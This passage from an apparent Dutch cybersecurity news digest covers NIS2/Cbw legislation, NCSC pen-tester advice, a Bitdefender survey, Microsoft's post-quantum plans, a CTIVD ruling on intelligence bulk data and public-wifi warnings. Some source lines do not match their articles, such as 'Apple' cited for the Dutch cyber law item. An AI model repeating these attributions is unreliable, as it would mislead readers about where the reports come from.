De discussie over een eigen chatapp voor de overheid speelt al jaren in Den Haag. Begin 2024 nam de Tweede Kamer een motie aan waarin het kabinet werd opgeroepen onderzoek te doen naar een speciale chatapp voor zakelijk contact voor ambtenaren en ministers, waarbij zowel een zelf te ontwikkelen app als het gebruik van een bestaande app tot de mogelijkheden behoorde. Eind 2024 besloot de toenmalige staatssecretaris voor Digitalisering tot een proof-of-concept voor een eigen chatapp voor ministers en ambtenaren om de haalbaarheid te onderzoeken. Na een periode van stilte meldde voormalig staatssecretaris Van Marum voor Digitalisering afgelopen oktober nog dat het kabinet nog steeds van plan was een eigen Rijksbrede chatapplicatie te ontwikkelen, zonder verdere details over de app of de planning te verstrekken.

 

Bron: Tweede Kamer

02 juli 2026 | NCSC deelt advies van pen testers voor veerkrachtige kritieke infrastructuur

Het National Cyber Security Centre (NCSC) heeft inzichten gedeeld van penetratietesters over hoe organisaties hun kritieke nationale infrastructuur (CNI) en operationele technologie (OT) veerkrachtiger kunnen maken tegen cyberaanvallen. Penetratietesters, ook wel pen testers genoemd, hebben als taak om systemen te doorbreken, gaten in infrastructuren te vinden en zwakke plekken te identificeren, zodat deze kunnen worden verholpen om de veerkracht tegen kwaadwillende aanvallers te verbeteren. De belangrijkste aanbevelingen richten zich op 'secure by design', netwerksegmentatie, logging en monitoring, en het gebruik van geaccrediteerde penetratietesten.

Volgens de pen testers is het cruciaal om systemen vanaf het begin 'secure by design' te ontwikkelen. Dit betekent dat beveiliging een van de belangrijkste vereisten is bij het ontwerp. Wanneer kwetsbaarheden worden gevonden, en deze zijn zelden afwezig, is het veel gemakkelijker om herstelmaatregelen te implementeren als de basis al veilig is. Een dergelijke aanpak legt de basis voor veel technische controles die aanvallen bemoeilijken.

Een duidelijk voorbeeld van 'secure by design' is netwerksegmentatie, vooral wanneer dit als onderdeel van het systeemontwerp is overwogen en niet achteraf is toegevoegd. Netwerksegmentatie omvat het opsplitsen van een netwerk in kleinere segmenten, hetzij door netwerkontwerp op hoog niveau, het gebruik van VLANs of firewalls, of door het beheer van gebruikers of groepen met afzonderlijke accounts voor verschillende netwerkgebieden. Voor OT-systemen is een duidelijke scheiding tussen de OT-besturingssystemen en de rest van de bedrijfsinfrastructuur (IT) essentieel. Vanuit een beveiligingsperspectief helpt segmentatie te voorkomen dat hackers zich lateraal door het netwerk bewegen, waardoor pen testers, die mogelijk al een voet aan de grond hebben gekregen, worden gehinderd in hun voortgang. In de context van OT kan dit de impact op processen en een potentieel verlies van beschikbaarheid voorkomen. Cross domain thinking helpt hierbij door vertrouwenszones te definiëren en datastromen daartussen strak te beheren. Veilige OT-connectiviteit moet blootgestelde verbindingen minimaliseren, toegangsroutes standaardiseren en grenzen versterken, terwijl Privileged Access Workstations (PAWs) vertrouwde apparaten bieden voor bevoorrecht beheer, wat sluiproutes vermindert en laterale beweging moeilijker maakt.

Bovenop een veilig ontworpen en goed gesegmenteerde omgeving worden logging en monitoring veel effectiever. Een systeem met kwalitatief goede logging en monitoring, en passende reacties op geïdentificeerde waarschuwingen of gebeurtenissen, maakt het werk van pen testers aanzienlijk lastiger. Een purple team-aanpak, die blauwe en rode teamactiviteiten combineert, kan helpen ervoor te zorgen dat ontdekte kwetsbaarheden worden begrepen en verholpen. Het NCSC benadrukt dat zelfs de beste logging- en monitoringcapaciteit nutteloos is als een organisatie niet de juiste gegevens verzamelt en hierop correct reageert. Organisaties moeten ervoor zorgen dat waarschuwingen grondig worden onderzocht en dat incidentrespons plannen worden opgesteld, regelmatig worden gecommuniceerd en met teams worden geoefend.

Tot slot raadt het NCSC aan om voor penetratietesten gebruik te maken van organisaties die zijn opgenomen in het CHECK-programma van het NCSC, dat geaccrediteerde providers omvat.

 

Bron: NCSC

02 juli 2026 | Bitdefender rapport onthult kloof tussen cyberbewustzijn en operationele veerkracht

Het 2026 Bitdefender Cybersecurity Assessment heeft een opvallende kloof blootgelegd tussen het groeiende bewustzijn van cyberrisico's en de daadwerkelijke operationele veerkracht van organisaties. Hoewel bedrijven zich meer dan ooit bewust zijn van de gevaren, blijkt het omzetten van dit bewustzijn in effectieve verdediging een steeds grotere uitdaging. Het rapport, gebaseerd op een onafhankelijke enquête onder 1.200 IT- en cybersecurity professionals in zes landen, wijst op diverse paradoxen.

Een van de belangrijkste bevindingen betreft de zichtbaarheid van het gebruik van kunstmatige intelligentie (AI) door medewerkers. Hoewel 51,8 procent van de respondenten meent volledig inzicht te hebben in zowel toegestaan als niet-toegestaan gebruik van AI, geeft 47,4 procent toe slechts gedeeltelijk of helemaal geen zicht te hebben op Shadow AI tools of persoonlijke AI-accounts die voor werkdoeleinden worden ingezet. Dit verschil wordt nog duidelijker wanneer leiderschap wordt vergeleken met uitvoerend personeel, want bijna 58 procent van de managers gelooft volledige zichtbaarheid te hebben, terwijl slechts 45,9 procent van de professionals dit beaamt. Dit duidt erop dat strategische beslissingen mogelijk worden genomen op basis van een onvolledig beeld van de blootstelling aan AI.

Daarnaast is de reductie van de aanvalsoppervlakte een breed erkende prioriteit, maar de implementatie ervan stuit op aanzienlijke obstakels. Respondenten noemen het handhaven van hardening beleid en uitzonderingen (38 procent), de angst voor verstoring van bedrijfsactiviteiten (35,4 procent) en beperkte middelen (34,6 procent) als de grootste barrières. Onzekerheid over welke legitieme tools individuele gebruikers daadwerkelijk nodig hebben, werd door 33,8 procent genoemd, oplopend tot 48,8 procent bij Amerikaanse organisaties.

Het onderzoek toont ook aan dat AI de meeste aandacht opeist in cybersecurity gesprekken, maar dat dit mogelijk afleidt van meer gangbare aanvalstechnieken. Hoewel dreigingen gerelateerd aan AI, zoals zelfmuterende malware (55,9 procent), datalekken via publieke LLM's (53,5 procent) en door AI gedreven ontwijkingstechnieken (52,5 procent), hoog scoren als risico, wordt AI door tegenstanders voornamelijk gebruikt om bestaande technieken te verfijnen, zoals phishing campagnes overtuigender maken en verkenning automatiseren. Ondertussen blijven Living off the Land (LOTL) technieken, waarbij legitieme tools in de omgeving worden misbruikt, onderbelicht. Bitdefender Labs ontdekte dat 84 procent van de aanvallen met hoge ernst LOTL technieken gebruikte, terwijl slechts één op de vijf respondenten dit als een topprioriteit zag.

Tot slot werpt het rapport licht op de uitdaging van transparantie na een datalek. Meer dan de helft (55,2 procent) van de respondenten die in de afgelopen twaalf maanden een incident hadden meegemaakt, verklaarde dat zij de instructie kregen om het incident vertrouwelijk te houden, ondanks de overtuiging dat autoriteiten geïnformeerd hadden moeten worden. Dit percentage stijgt naar 68,6 procent in de Verenigde Staten, wat belangrijke vragen oproept over governance, compliance en vertrouwen.

De bevindingen onderstrepen dat bewustzijn alleen niet langer voldoende is. De ware uitdaging voor cybersecurity in 2026 ligt in het operationeel maken van dit begrip, terwijl een evenwicht wordt gevonden tussen productiviteit, complexiteit, compliance en beperkte middelen.

 

Bron: Bitdefender

02 juli 2026 | Cyberbeveiligingswet naar Eerste Kamer, kan op 15 augustus ingaan

De Cyberbeveiligingswet (Cbw), die strenge eisen stelt aan de digitale weerbaarheid van ongeveer achtduizend organisaties in Nederland, is onderweg naar de Eerste Kamer en kan naar verwachting op 15 augustus in werking treden. Dit is vandaag gemeld door het Nationaal Cyber Security Centrum (NCSC) en de Nationaal Coördinator Terrorismebestrijding en Veiligheid (NCTV). De Cbw vormt de Nederlandse implementatie van de Europese NIS2-richtlijn, die als doel heeft de cyberbeveiliging binnen de Europese Unie te versterken.

Organisaties die onder het bereik van deze nieuwe wet vallen, zullen geconfronteerd worden met diverse verplichtingen gericht op het verbeteren van hun digitale weerbaarheid. Deze verplichtingen omvatten onder meer een verplichte registratie bij het NCSC, het naleven van een wettelijke zorgplicht voor cybersecurity, en een meldplicht voor significante incidenten die de digitale infrastructuur kunnen beïnvloeden. Daarnaast eist de wet dat bestuurders van deze organisaties aantoonbare kennis van cybersecurity bezitten en dat er verplicht risicobeheer wordt toegepast op zowel leveranciers als de gehele toeleveranciersketen.

Het is de verantwoordelijkheid van de organisaties zelf om te bepalen of zij onder de reikwijdte van de Cbw vallen. De NCTV adviseert organisaties om proactief te handelen. Een aanbevolen eerste stap is het uitvoeren van een risicoanalyse om de bestaande cyberrisico's in kaart te brengen en te beoordelen welke maatregelen reeds zijn geïmplementeerd om deze risico's te beheersen. De uitkomsten van deze analyse dienen besproken te worden met het bestuur, waarna afspraken gemaakt moeten worden over eventuele verbetermaatregelen en vervolgstappen. Ook de voorbereiding van de registratie wordt aangeraden.

De Tweede Kamer heeft in april van dit jaar al ingestemd met de Cbw. De Eerste Kamer zal naar verwachting op 6 of 7 juli vergaderen over het wetsvoorstel en hierover stemmen. Indien de Eerste Kamer akkoord gaat, kan de Cyberbeveiligingswet zoals verwacht op 15 augustus van dit jaar in werking treden, wat een belangrijke stap betekent voor de nationale cyberbeveiliging.

 

Bron: Apple | Bron 2: ncsc.nl | Bron 3: rijksoverheid.nl

02 juli 2026 | Microsoft versnelt overstap naar postkwantumcryptografie naar 2029

Microsoft heeft dinsdag aangekondigd zijn roadmap voor kwantumveilige beveiliging te versnellen. De technologische vooruitgang in kwantumcomputing maakt het volgens de onderneming essentieel om bestaande encryptiestandaarden eerder dan verwacht te vervangen. Mark Russinovich, Chief Technology Officer van Microsoft Azure, stelde dat de risicohorizon is verschoven door ontwikkelingen in kwantumonderzoek en -ontwikkeling. Hij verwacht dat cryptografisch relevante kwantumcomputers eerder dan verwacht beschikbaar kunnen zijn, en benadrukt de aanzienlijke inspanningen die nodig zijn om hierop voorbereid te zijn, wat organisaties nu al moeten oppakken.

Om deze reden versnelt Microsoft de tijdlijn van zijn Quantum Safe Program (QSP) met als doel kritieke producten en diensten tegen 2029 over te zetten naar post-kwantum cryptografie (PQC). Het bedrijf is eveneens van plan om PQC-vereisten op te nemen in zijn Secure Future Initiative (SFI). Belangrijke aandachtsgebieden omvatten het upgraden van netwerkcryptografie door de adoptie van TLS 1.3, het inbouwen van 'crypto-agility' voor opgeslagen data om de mogelijkheid te faciliteren om cryptografie te wijzigen zonder de onderliggende systemen opnieuw te hoeven ontwerpen, en de overgang naar PQC-algoritmen voor het beveiligen van 'trust chains' zoals code signing, certificaatuitgifte, sleutelbescherming en update pipelines.

Russinovich legde uit dat dit de kwantumveilige gereedheid binnen hetzelfde gedisciplineerde engineeringkader brengt dat Microsoft gebruikt voor andere kritieke beveiligingsresultaten, met duidelijke verantwoordelijkheid, meetbare mijlpalen en transparante voortgang. Het inbedden van deze mogelijkheden in de platforms stelt klanten in staat om sneller en met meer vertrouwen te handelen.

Microsoft merkte ook op dat crypto-agility essentieel is voor de post-kwantum migratie. Dit vereist het verwijderen van hard-coded algoritme-aannames, het bewaren van voldoende informatie om de cryptografische context te reconstrueren, en het bouwen van systemen zodanig dat algoritme-upgrades routinematige engineeringtaken worden in plaats van noodzakelijke herschrijvingen. Een goed ontworpen crypto-agiel systeem zou ernaar moeten streven om oudere ciphertext-formaten lang genoeg te kunnen lezen om migratie te ondersteunen, terwijl nieuwe data met de nieuwste goedgekeurde configuratie wordt geschreven.

Deze ontwikkeling komt enkele dagen nadat de Amerikaanse president Donald Trump een uitvoerend bevel ondertekende met harde deadlines voor federale agentschappen om hoogwaardige activa en systemen met hoge impact over te zetten naar PQC. Eerder dit jaar, in maart, kondigde Google een nieuw programma aan in zijn Chrome-browser om ervoor te zorgen dat HTTPS-certificaten veilig zijn tegen het toekomstige risico van kwantumcomputers. In diezelfde maand heeft de techgigant zich publiekelijk gecommitteerd om zijn eigen infrastructuur tegen 2029 kwantumveilig te maken. Webinfrastructuurbedrijf Cloudflare heeft dit voorbeeld gevolgd met vergelijkbare plannen om tegen hetzelfde jaar over te stappen op PQC.

De dreiging wordt versterkt door het concept "harvest now, decrypt later", waarbij tegenstanders versleutelde data nu kunnen verzamelen in de hoop deze later te decoderen zodra een grootschalige kwantummachine operationeel wordt. Bovendien heeft een team van onderzoekers van Google onthuld dat het kwantumalgoritme voor het kraken van elliptische curve cryptografie, specifiek de 256-bit elliptische curve discrete logaritme (ECDLP-256), drastisch is verbeterd, met minder qubits en gates dan eerder werd gedacht. Afzonderlijk demonstreerde een groep academici van Caltech en Oratomic een nieuwe foutcorrectie-aanpak die Shor's algoritme praktisch zou kunnen maken met slechts 10.000 herconfigureerbare qubits en potentieel RSA-2048 en P-256 zou kunnen breken.

 

Bron: Microsoft | Bron 2: blog.google | Bron 3: blog.cloudflare.com

02 juli 2026 | CTIVD: AIVD en MIVD verwerken persoonsgegevens onrechtmatig

De Commissie Toezicht op de Inlichtingen- en Veiligheidsdiensten (CTIVD) heeft geoordeeld dat de Algemene Inlichtingen- en Veiligheidsdienst (AIVD) en de Militaire Inlichtingen- en Veiligheidsdienst (MIVD) persoonsgegevens in bulkdatasets onrechtmatig hebben verwerkt. Deze bevindingen, gepubliceerd op 1 juli 2026, wijzen op diverse tekortkomingen in de processen van de diensten.

Volgens de CTIVD hadden groepen medewerkers onrechtmatig toegang tot persoonsgegevens. Daarnaast werden grote hoeveelheden persoonsgegevens in meerdere gevallen langer bewaard dan toegestaan. De toezichthouder heeft dertien aanbevelingen gedaan om de situatie te verbeteren.

De AIVD en MIVD maken voor hun taken gebruik van bulkdatasets, dit zijn omvangrijke verzamelingen van soms miljoenen regels gegevens. Deze kunnen namen, telefoonnummers, locatiegegevens, socialmediagegevens of inhoudelijke communicatiegegevens bevatten. De datasets zijn afkomstig van overheidsinstanties, maar kunnen ook commercieel verkregen zijn of gestolen datasets die door criminelen worden aangeboden.

De geldende regels bepalen dat verkregen datasets slechts beperkte tijd mogen worden bewaard. Ook moet het aantal personen dat met de gegevens werkt binnen de AIVD en MIVD beperkt zijn en moet de toegang tot de gegevens streng worden gecontroleerd. Gegevens die niet relevant blijken voor onderzoek moeten door de diensten worden vernietigd. De CTIVD concludeert echter dat de diensten hun processen niet goed op orde hebben.

In het onderzoeksrapport spreekt de CTIVD over "ernstige risico's en onrechtmatigheden met betrekking tot de toegang van medewerkers tot bulkdatasets", met name datasets waarvoor een beperkt of strikt beperkt toegangsregime geldt. De logging van gegevens blijkt onvoldoende inzicht te bieden voor een goede beoordeling van de processen.

CTIVD-voorzitter Hugo Hillenaar benadrukt dat de verwerking van gegevens uit bulkdatasets een privacy inbreuk vormt voor de betrokken personen. Hij merkt op dat het merendeel van de mensen in deze datasets niets te maken heeft met spionage of terrorisme, en dat de waarborgen omtrent gegevensverwerking daarom op orde moeten zijn. De maatschappij en politiek moeten erop kunnen vertrouwen dat de diensten zich aan de geldende regelgeving houden.

De problemen worden volgens de CTIVD veroorzaakt door technische tekortkomingen in de systemen en ontoereikende procedures voor de naleving van beleid en regelgeving. Een van de aanbevelingen betreft het gebruik van gestolen datasets die criminelen op internet aanbieden. De AIVD en MIVD beschouwen deze datasets nu als openbaar toegankelijk. De CTIVD adviseert om gegevens niet als openbaar toegankelijk te beschouwen wanneer niet feitelijk kan worden vastgesteld of ze openbaar toegankelijk zijn (geweest), en hierbij rekening te houden met het feit dat gegevens uit een datalek openbaar kunnen zijn zonder dat betrokkenen deze zelf openbaar hebben gemaakt.

Ministers Heerman van Binnenlandse Zaken en Yesilgöz van Defensie hebben gereageerd en erkennen het door de toezichthouder geschetste beeld. Ze geven aan deze aanbeveling grotendeels over te nemen. Vanaf nu zullen bulkdatasets als niet openbaar toegankelijk worden aangemerkt indien onduidelijk is of deze openbaar zijn (geweest). Tijdens de onderzoeksperiode hebben de diensten de regels rondom het openbaarheidscriterium in het beleid reeds verduidelijkt en aangescherpt. Het verbeteren van het beheer van bulkdatasets staat hoog op de agenda van de diensten.

 

Bron: CTIVD | Bron 2: apps.obtainium.page | Bron 3: quad9.net

02 juli 2026 | Politiedatabase Camera in Beeld telt meer dan 360.000 camera's, roept privacydebat op

De Nederlandse politiedatabase Camera in Beeld heeft een aanzienlijke groei doorgemaakt en omvat nu meer dan 360.000 beveiligingscamera's. Deze camera's zijn afkomstig van burgers, bedrijven en overheidsinstanties, en het aantal geregistreerde camera's is de afgelopen drie jaar met ruim 40.000 toegenomen. Camera in Beeld is een systeem van de politie waar burgers en organisaties hun beveiligingscamera's vrijwillig kunnen registreren. Het doel is om bij incidenten, zoals een inbraak, snel te achterhalen waar mogelijk relevante camerabeelden beschikbaar zijn, waarna contact wordt opgenomen met de eigenaar van de camera om de beelden op te vragen.

Volgens de politie wordt in dit systeem per straat bijgehouden welke beveiligingscamera's er zijn, wie de eigenaar is en hoe lang de beelden worden bewaard. Door gebruik te maken van registratie met DigiD kunnen de gegevens over de camera's gemakkelijker actueel worden gehouden en gericht worden opgevraagd, met als doel daders sneller op te sporen. De politie benadrukt dat zij niet live meekijkt met de beelden. Echter, BNR maakte eerder bekend dat de beelden vaak wel worden gevorderd.

Een woordvoerder van de politie liet het AD weten dat in 2023 ongeveer vijfduizend keer camerabeelden werden opgeëist. Specifieke cijfers voor de daaropvolgende jaren kan de woordvoerder niet geven. Opmerkelijk is dat het gebruik van camerabeelden niet heeft geleid tot een stijging van het aantal opgehelderde diefstallen en mishandelingen; de ophelderingspercentages voor beide misdrijven zijn zelfs gedaald. Desondanks blijft de politie stellen dat camerabeelden een belangrijk onderdeel van de opsporing vormen.

De groei en het gebruik van de database leiden tot kritiek van burgerrechtenorganisatie Bits of Freedom (BoF). BoF noemt Camera in Beeld een "buitenwettelijk surveillancenetwerk" waarbij de politie burgers inzet om regels te omzeilen en toegang te verkrijgen tot beeldmateriaal van stukjes openbare ruimte. Lotte Houwing, medewerker van BoF, stelt in het AD dat de politie hiermee de wettelijk afgesproken grenzen overschrijdt en de privacy volledig uit het oog verliest.

 

Bron: Politie

02 juli 2026 | Belgische overheid waarschuwt voor gevaren openbare wifi

Het Centrum voor Cybersecurity België (CCB) adviseert burgers en bedrijven om uiterst voorzichtig te zijn met openbare wifi netwerken en om deze, indien onbeveiligd, volledig te vermijden. Deze waarschuwingen komen in aanloop naar de vakantieperiode, waarin veel mensen gebruikmaken van wifi in hotels, op luchthavens en in cafés.

Volgens het CCB kan een aanvaller op een onbeveiligd open netwerk gemakkelijk al het dataverkeer van aangesloten apparaten onderscheppen en lezen. Dit betekent dat alle informatie die in onversleutelde tekst wordt verzonden, toegankelijk is voor kwaadwillenden. Hoewel wifi netwerken die met een wachtwoord zijn beveiligd een betere optie kunnen zijn, benadrukt het CCB dat aanvullende voorzorgsmaatregelen noodzakelijk zijn. Hierbij hoort het regelmatig updaten van software, het gebruik van een VPN (Virtual Private Network) en het valideren van DNS responses via het DNSSEC protocol. Het CCB waarschuwt echter dat een VPN op zichzelf geen allesomvattende oplossing is. Na het gebruik van een openbaar wifi netwerk wordt geadviseerd om dit netwerk altijd uit de lijst met bekende wifi netwerken op het apparaat te verwijderen.

Daarnaast geeft de Belgische overheidsinstantie advies over de beveiliging van routers voor thuisgebruik. Er bestaat een misvatting dat routers die door internetproviders (ISP's) worden geleverd, standaard veilig zijn. Dit is vaak niet het geval, omdat veel consumentenrouters geconfigureerd blijven met fabrieksinstellingen, zoals generieke wachtwoorden en verouderde protocollen. Vaak wordt de firmware ook nooit bijgewerkt. Het CCB raadt consumenten aan om sterke wachtwoorden van minstens twaalf tekens in te stellen, gebruik te maken van het WPA3 protocol en alle beschikbare firmware updates te installeren.

Voor bedrijven is het advies om het gastnetwerk strikt te scheiden van het interne netwerk. Ondernemingen moeten zich bewust zijn van het feit dat via wifi persoonsgegevens kunnen worden verwerkt en dat er interactie kan zijn met betalings- of operationele systemen. Het CCB benadrukt dat, met name in de horeca, wifi niet als een gratis extraatje moet worden beschouwd, maar als een cruciale, gesegmenteerde en gemonitorde dienst.

 

Bron: Centrum voor Cybersecurity België (CCB) | Bron 2: ccb.belgium.be

02 juli 2026 | Z-CERT benoemt vier vaste partners voor incidentbestrijding in de zorg

Het expertisecentrum voor cybersecurity in de Nederlandse zorg, Z-CERT, heeft een belangrijke stap gezet in het versterken van de digitale weerbaarheid van de sector. Op 29 juni 2026 maakte Z-CERT de aanwijzing bekend van vier bedrijven als vaste partners voor de bestrijding van cyberincidenten. De geselecteerde partijen zijn Atos, Fox-IT, KPN Health en Tesorion, die een cruciale rol gaan spelen in het nationale raamwerk voor incidentbestrijding.

Deze strategische samenwerking is een direct antwoord op de toenemende dreiging en het groeiende aantal cyberaanvallen op zorgorganisaties in Nederland. Door deze partnerschappen kunnen ziekenhuizen, universitair medische centra en andere zorginstellingen in geval van een cyberaanval direct een gespecialiseerd responseteam inschakelen. Dit garandeert snelle en effectieve ondersteuning wanneer de sector het meest kwetsbaar is.

De aangewezen partners zullen dag en nacht beschikbaar zijn om ondersteuning te bieden bij diverse aspecten van incidentbestrijding. Hun taken omvatten het analyseren van de aanval, het beperken van de schade en het zorgvuldig herstellen van de getroffen systemen. Hierbij voeren zij onder andere digitaal forensisch onderzoek uit en verzorgen zij gedetailleerde dreigingsanalyses om toekomstige incidenten te voorkomen. Specifiek zijn Atos en Fox-IT voor een periode van vier jaar aangewezen als nationale CSIRT-partners, wat hun rol als primaire responsteams onderstreept. Deze gestructureerde aanpak moet de continuïteit van de zorg waarborgen en patiëntgegevens beschermen tegen cybercriminelen.

 

Bron: Techzine